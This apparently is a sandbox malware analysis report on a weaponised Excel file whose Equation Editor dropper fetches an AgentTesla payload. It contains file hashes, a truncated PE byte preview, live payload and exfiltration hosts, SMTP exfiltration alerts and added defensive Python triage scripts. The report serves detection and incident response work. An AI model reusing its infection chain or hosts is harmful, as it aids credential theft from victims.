                                            SSDEEP:12288:QoLLoS60/K7yh0AGWPlPjC6EPOyZoTRXq0R193e4hyOVj4:QoLAPWtP7uDK5R1p8Oq
                                            MD5:0B4CC13DE8C54ADD5149B56649B3F680
                                            SHA1:4FB70EDD4A74EA99D93225D8FC2901F699F1140F
                                            SHA-256:579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A
                                            SHA-512:37A087FA83253AEE38EA440961A402F178EEB1209076E635B12DC829AAED691F81FFA637D148864AD8DACAD9BA66319A8605E71BBABC952F514F654B7FDE99C5
                                            Malicious:true
                                            Antivirus:
                                            • Antivirus: ReversingLabs, Detection: 49%
                                            Reputation:low
                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5L...............0................. ........@.. ....................................@.....................................O...................................l................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........e...~......v....................................................0...........r...p.+..*..0...........r...p.+..*".(.....*.0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..C........(L...&............( ...h}........(!...h}.......("... ......(V...&*>...(#...(.....*..0..2..........($.....(%........,...("......(&....('...(.....*>...(#...(.....*...0................b`.+..*...("... .......( ...h..(!...h(....(Q...&*..0..........
                                            C:\Users\user\Desktop\~$99feb78a_by_Libranalysis.xlsx
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):165
                                            Entropy (8bit):1.4377382811115937
                                            Encrypted:false
                                            SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                            MD5:797869BB881CFBCDAC2064F92B26E46F
                                            SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                            SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                            SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                            Malicious:true
                                            Reputation:high, very likely benign file
                                            Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
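The four records above describe one binary in three places (the IE cache copy fetched by EQNEDT32.EXE, the copy it dropped into Roaming, and the copy that dropped binary made of itself under Roaming\Nwefile) plus Excel's owner lock file. The following Python is an added example, not part of the Joe Sandbox report: it takes the records exactly as the report lists them (process, path, file type, SHA-256; embedded below as constructed input), collapses copies by hash, and flags the two patterns a responder would script for: an Office helper process writing a PE, and a dropped binary copying itself to a persistence folder. The helper-process list is an assumption made for the example.

```python
"""Correlate sandbox "Created / dropped Files" records (added example).

Input rows are (writing process, written path, file type, SHA-256), copied from
the report section above. Nothing here is the sandbox's own code.
"""
import ntpath
from collections import defaultdict

PE_TYPE = "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows"
PE_HASH = "579D75FB8F8F893D2E1AE2845FC40E21EAB07AA6601B235E8C77F6E52956EF1A"

# Constructed from the report: (process, path, file type, sha256)
DROPPED = [
    (r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files"
     r"\Content.IE5\ZAE7RW1P\joewealthx[1].exe", PE_TYPE, PE_HASH),
    (r"C:\Users\user\AppData\Roaming\joewealth28743.exe",
     r"C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe", PE_TYPE, PE_HASH),
    (r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Users\user\AppData\Roaming\joewealth28743.exe", PE_TYPE, PE_HASH),
    (r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     r"C:\Users\user\Desktop\~$99feb78a_by_Libranalysis.xlsx", "data",
     "D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185"),
]

# Assumption for this example: Office components that should never write a PE
# file. Extend the set for the products deployed in your estate.
OFFICE_HELPERS = {"EQNEDT32.EXE", "WINWORD.EXE", "EXCEL.EXE", "POWERPNT.EXE"}


def is_pe(file_type: str) -> bool:
    """The report's libmagic-style file type starts with PE32 for PE files."""
    return file_type.startswith("PE32")


def group_by_hash(records):
    """Map SHA-256 -> list of paths, so copies of one binary collapse to one key."""
    groups = defaultdict(list)
    for _proc, path, _ftype, sha in records:
        groups[sha].append(path)
    return dict(groups)


def flag(records):
    """Return (finding, path) tuples for the two patterns described above."""
    # Paths this table says were written, keyed case-insensitively (NTFS is
    # case-insensitive), so we can tell when a writer is itself a dropped file.
    written = {path.lower(): sha for _proc, path, _ftype, sha in records}
    findings = []
    for proc, path, ftype, sha in records:
        if not is_pe(ftype):
            continue
        if ntpath.basename(proc).upper() in OFFICE_HELPERS:
            findings.append(("office helper wrote PE", path))
        # The writer was dropped earlier with the same hash as what it wrote:
        # the payload copied itself (here into Roaming\Nwefile).
        if written.get(proc.lower()) == sha:
            findings.append(("dropped binary copied itself (persistence)", path))
    return findings


if __name__ == "__main__":
    for sha, paths in group_by_hash(DROPPED).items():
        print(sha, "->", len(paths), "path(s)")
    for kind, path in flag(DROPPED):
        print(f"[{kind}] {path}")
```

Run against the report's rows, this yields one PE hash covering three paths and three findings: two EQNEDT32.EXE PE drops and the Nwefile.exe self-copy. The same two checks transfer directly to EDR file-write telemetry, where the writer's image path and the file hash are available per event.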

                                            Static File Info

                                            General

                                            File type:Microsoft Excel 2007+
                                            Entropy (8bit):7.997938558476036
                                            TrID:
                                            • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
                                            • ZIP compressed archive (8000/1) 16.67%
                                            File name:99feb78a_by_Libranalysis.xlsx
                                            File size:658060
                                            MD5:99feb78ab55c66b871d8998b20528b61
                                            SHA1:1c96f08e92401f2396ad0b074ca55049a773e4e0
                                            SHA256:5f4e4fbde7ed003dc34954ee301977f697de1cd2d52beafd898023797ab47255
                                            SHA512:29bf77dd8938db2372289af6ebcd41718cccbd2c243f17883e57a8cc14a6211ded0d5658e81f79812d97c74c934255ee83eaef88bdb9d15d9fe24d2cb36d069e
                                            SSDEEP:12288:ZS0xXaNcg+zPU79FzdbzdSy/3mKEQZMFcIp0k6Po/6ziiDYIOCnF4V19hbVW+FqC:fXukjU7dvdZtZUUPLmiHfKhhW+FqC
                                            File Content Preview:PK........HI.R.c..............[Content_Types].xmlUT......`...`...`.U_O.0.......uj.v......mo........c[.....s:`C.Q....J......f....kHh...........e%.\.....Iy.\.P.-.8...4..F...=V.!...D.@....<.,Bj..kZ...J-AN..oR.O.iD.C.g..P.......SR[/...s...*Fg."..ko....ba5..o[

                                            File Icon

                                            Icon Hash:e4e2aa8aa4b4bcb4

                                            Static OLE Info

                                            General

                                            Document Type:OpenXML
                                            Number of OLE Files:1

                                            OLE File "/opt/package/joesandbox/database/analysis/412910/sample/99feb78a_by_Libranalysis.xlsx"

                                            Indicators

                                            Has Summary Info:False
                                            Application Name:unknown
                                            Encrypted Document:False
                                            Contains Word Document Stream:
                                            Contains Workbook/Book Stream:
                                            Contains PowerPoint Document Stream:
                                            Contains Visio Document Stream:
                                            Contains ObjectPool Stream:
                                            Flash Objects Count:
                                            Contains VBA Macros:False

                                            Summary

                                            Author:Modexcomm
                                            Last Saved By:Modexcomm
                                            Create Time:2019-11-27T09:20:57Z
                                            Last Saved Time:2019-11-27T09:22:47Z
                                            Creating Application:Microsoft Excel
                                            Security:0

                                            Document Summary

                                            Thumbnail Scaling Desired:false
                                            Contains Dirty Links:false
                                            Shared Document:false
                                            Changed Hyperlinks:false
                                            Application Version:12.0000

                                            Streams

                                            Stream Path: \x1ole10nativE, File Type: data, Stream Size: 957277
                                            General
                                            Stream Path:\x1ole10nativE
                                            File Type:data
                                            Stream Size:957277
                                            Entropy:5.83349320552
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . f . . . . . . . p . . . . . . . . . . . . . . . . . . . 7 . . . . > S . . . . . . . - " . . . . . . . . @ . . ] . * . ; - . . . . s K . . . C . . . . . . . s . . . . D 5 . . . " . 4 . . . , x . . ' . h . R . . ; . . . . J . . . . . . - . 0 . . . , . @ . . 7 2 Z . . a . ^ ; 4 7 . x . m * W . E T . 8 N F . d . z . c . + . . . ' . . . 3 . Y . . . . . . j . . . s . . ! . . : w . . . . . . . . . ` V N . . . . . . . f N ) . . . T . < . ` x . . . 9 & . . z . H . . . . . \\ . . l . . . . . q . . . .
                                            Data Raw:d4 8d d2 03 02 03 a2 0b 66 a5 01 08 d7 0c bb ab 70 d3 d3 81 f3 97 cd 96 d3 8b 0b 8b 19 be e7 0b f7 f2 81 ee 37 a4 b0 f2 8b 3e 53 ff d7 05 d1 d0 ac b7 2d 22 d0 ac b7 ff e0 d5 89 9f 40 00 de 5d 81 2a f3 3b 2d a2 19 b6 8e 73 4b 10 bc d8 43 0c 86 8d b8 a1 99 ed 73 b5 a3 dd 02 44 35 b9 d0 e2 22 a3 34 8d e3 d8 2c 78 a4 f1 27 09 68 ae 52 11 88 3b ca fe f3 85 4a 0f ee 02 aa c7 c6 2d be 30
                                            Stream Path: 4GlTJmcon8VdDTzzzrv8wAmWEC, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:4GlTJmcon8VdDTzzzrv8wAmWEC
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
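The stream listing above is the only view the report gives of the embedded OLE object: a stream named `\x1ole10nativE` (the canonical name is `\x01Ole10Native`; the casing differs) whose first bytes do not look like an Ole10Native length header, and a second, randomly named, empty stream. The Python below is an added example, not part of the Joe Sandbox report, that triages such a listing offline. The stream names, sizes and the leading bytes of the raw preview are copied from the table above as constructed input; the canonical stream-name list and the Ole10Native header rule (a well-formed stream begins with a little-endian DWORD equal to the remaining stream length) are standard OLE facts assumed for the example, not statements the report makes.

```python
"""Triage an OLE stream listing for name and header anomalies (added example).

Input is taken from the report's "Streams" section: (stream name, stream size,
first bytes of the raw preview). Nothing here is the sandbox's own code.
"""

# Canonical names of streams Office looks up in an embedded OLE object. The
# leading control byte and the casing are part of the canonical name. Office's
# lookup is case-insensitive, so a case-mangled name still loads, while a
# case-sensitive signature (naive YARA/regex) misses it: that disagreement is
# the red flag.
KNOWN_STREAMS = ("\x01Ole10Native", "\x01CompObj", "\x03ObjInfo", "Equation Native")

# Constructed from the report ("\x1" in the report is the 0x01 control byte).
REPORTED_STREAMS = [
    ("\x01ole10nativE", 957277,
     bytes.fromhex("d48dd2030203a20b66a50108d70cbbab70d3d381f397cd96d38b0b8b19bee70b")),
    ("4GlTJmcon8VdDTzzzrv8wAmWEC", 0, b""),
]


def printable(name: str) -> str:
    """Render control bytes as \\xNN so findings are readable in a terminal."""
    return name.encode("unicode_escape").decode()


def ole10native_declared_length(head: bytes):
    """Ole10Native streams open with a little-endian uint32: the byte count of
    everything after that DWORD. None if fewer than four bytes are available."""
    if len(head) < 4:
        return None
    return int.from_bytes(head[:4], "little")


def triage_stream(name: str, size: int, head: bytes) -> list:
    findings = []
    label = printable(name)
    canonical = next((k for k in KNOWN_STREAMS if k.lower() == name.lower()), None)

    if canonical is not None and canonical != name:
        findings.append(f"{label}: case-mangled variant of {printable(canonical)}")

    if canonical is not None and canonical.lower() == "\x01ole10native":
        declared = ole10native_declared_length(head)
        # A well-formed Ole10Native stream declares exactly size - 4 here.
        if declared is not None and declared != size - 4:
            findings.append(
                f"{label}: declared payload length {declared} != stream size - 4 "
                f"({size - 4}); header is not a valid Ole10Native header")

    if canonical is None and size == 0:
        findings.append(f"{label}: unknown empty stream (likely padding/decoy)")
    elif canonical is None and not name.startswith(("\x01", "\x03", "\x05")):
        findings.append(f"{label}: non-standard stream name")
    return findings


def triage(streams=REPORTED_STREAMS) -> dict:
    """Map printable stream name -> list of findings."""
    return {printable(name): triage_stream(name, size, head)
            for name, size, head in streams}


if __name__ == "__main__":
    for stream, notes in triage().items():
        print(stream)
        for note in notes:
            print("   -", note)
```

For the sample's listing this reports two findings on `\x01ole10nativE` (case-mangled name; a declared length of 0x03d28dd4 against a stream of 957277 bytes) and one on the empty random-named stream. To run it against a real document rather than the report table, unzip the .xlsx, feed each `xl/embeddings/*.bin` to an OLE parser such as olefile, and pass its stream names, sizes and first bytes into `triage()`.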

                                            Network Behavior

                                            Snort IDS Alerts

                                            Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                            05/13/21-03:23:11.176471 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49169 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:23:19.583159 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49170 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:23:29.539826 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49171 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:23:35.576991 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49172 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:23:54.212356 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49174 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:24:05.104636 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49175 | 587 | 192.168.2.22 | 162.241.85.66
                                            05/13/21-03:24:10.242606 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49176 | 587 | 192.168.2.22 | 162.241.85.66

                                            Network Port Distribution

                                            TCP Packets

                                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                            May 13, 2021 03:22:25.335659981 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.384277105 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.384367943 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.384917021 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.433598042 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434566975 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434598923 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434622049 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434645891 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434653044 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434689999 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434701920 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434725046 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434746981 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434747934 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434772015 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434779882 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434793949 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434818029 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434860945 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.434868097 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.434904099 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.443057060 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483283997 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483320951 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483345985 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483369112 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483391047 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483392000 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483411074 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483417034 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483418941 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483421087 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483443975 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483467102 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483489037 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483490944 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483500004 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483505011 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483511925 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483525038 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483536005 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483560085 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483599901 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483611107 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483617067 CEST | 49167 | 80 | 192.168.2.22 | 185.239.243.112
                                            May 13, 2021 03:22:25.483628035 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483653069 CEST | 80 | 49167 | 185.239.243.112 | 192.168.2.22
                                            May 13, 2021 03:22:25.483674049 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483675957 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483697891 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483699083 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483736992 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483741999 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483743906 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483766079 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483781099 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483789921 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483803988 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483817101 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.483824968 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.483855009 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.485155106 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533689022 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533725023 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533744097 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533761978 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533787966 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533813953 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533838987 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533862114 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533864975 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533885002 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533902884 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533920050 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533945084 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533946037 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533957958 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533971071 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533976078 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.533996105 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.533999920 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534008026 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534017086 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534023046 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534035921 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534046888 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534077883 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534089088 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534113884 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534137964 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534161091 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534173965 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534185886 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534199953 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534205914 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534236908 CEST4916780192.168.2.22185.239.243.112
                                            May 13, 2021 03:22:25.534245014 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534271002 CEST8049167185.239.243.112192.168.2.22
                                            May 13, 2021 03:22:25.534295082 CEST8049167185.239.243.112192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 13, 2021 03:22:25.203634024 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:22:25.260932922 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:22:25.261277914 CEST | 52197 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:22:25.318331957 CEST | 53 | 52197 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:03.165057898 CEST | 53099 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:03.353410959 CEST | 53 | 53099 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:09.481934071 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:09.692992926 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:09.696012974 CEST | 52838 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:09.752847910 CEST | 53 | 52838 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:18.072135925 CEST | 61200 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:18.129133940 CEST | 53 | 61200 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:27.948478937 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:28.011239052 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:28.012181044 CEST | 49548 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:28.063622952 CEST | 53 | 49548 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:34.145766973 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:34.205548048 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:34.206605911 CEST | 55627 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:34.266680002 CEST | 53 | 55627 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:45.845840931 CEST | 56009 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:45.905827999 CEST | 53 | 56009 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:52.810729980 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:52.868915081 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:23:52.869513988 CEST | 61865 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:23:52.926522970 CEST | 53 | 61865 | 8.8.8.8 | 192.168.2.22
May 13, 2021 03:24:01.436736107 CEST | 55171 | 53 | 192.168.2.22 | 8.8.8.8
May 13, 2021 03:24:01.494138002 CEST | 53 | 55171 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
May 13, 2021 03:22:25.203634024 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | carbinz.gq | A (IP address) | IN (0x0001)
May 13, 2021 03:22:25.261277914 CEST | 192.168.2.22 | 8.8.8.8 | 0xfc39 | Standard query (0) | carbinz.gq | A (IP address) | IN (0x0001)
May 13, 2021 03:23:03.165057898 CEST | 192.168.2.22 | 8.8.8.8 | 0xd9fb | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:09.481934071 CEST | 192.168.2.22 | 8.8.8.8 | 0xd926 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:09.696012974 CEST | 192.168.2.22 | 8.8.8.8 | 0xd926 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:18.072135925 CEST | 192.168.2.22 | 8.8.8.8 | 0x22bf | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:27.948478937 CEST | 192.168.2.22 | 8.8.8.8 | 0xca54 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:28.012181044 CEST | 192.168.2.22 | 8.8.8.8 | 0xca54 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:34.145766973 CEST | 192.168.2.22 | 8.8.8.8 | 0xf276 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:34.206605911 CEST | 192.168.2.22 | 8.8.8.8 | 0xf276 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:45.845840931 CEST | 192.168.2.22 | 8.8.8.8 | 0x7d69 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:52.810729980 CEST | 192.168.2.22 | 8.8.8.8 | 0xe625 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:23:52.869513988 CEST | 192.168.2.22 | 8.8.8.8 | 0xe625 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)
May 13, 2021 03:24:01.436736107 CEST | 192.168.2.22 | 8.8.8.8 | 0x7296 | Standard query (0) | mail.orienttech.com.qa | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
May 13, 2021 03:22:25.260932922 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | carbinz.gq | | 185.239.243.112 | A (IP address) | IN (0x0001)
May 13, 2021 03:22:25.318331957 CEST | 8.8.8.8 | 192.168.2.22 | 0xfc39 | No error (0) | carbinz.gq | | 185.239.243.112 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:03.353410959 CEST | 8.8.8.8 | 192.168.2.22 | 0xd9fb | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:09.692992926 CEST | 8.8.8.8 | 192.168.2.22 | 0xd926 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:09.752847910 CEST | 8.8.8.8 | 192.168.2.22 | 0xd926 | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
May 13, 2021 03:23:18.129133940 CEST | 8.8.8.8 | 192.168.2.22 | 0x22bf | No error (0) | mail.orienttech.com.qa | | 162.241.85.66 | A (IP address) | IN (0x0001)
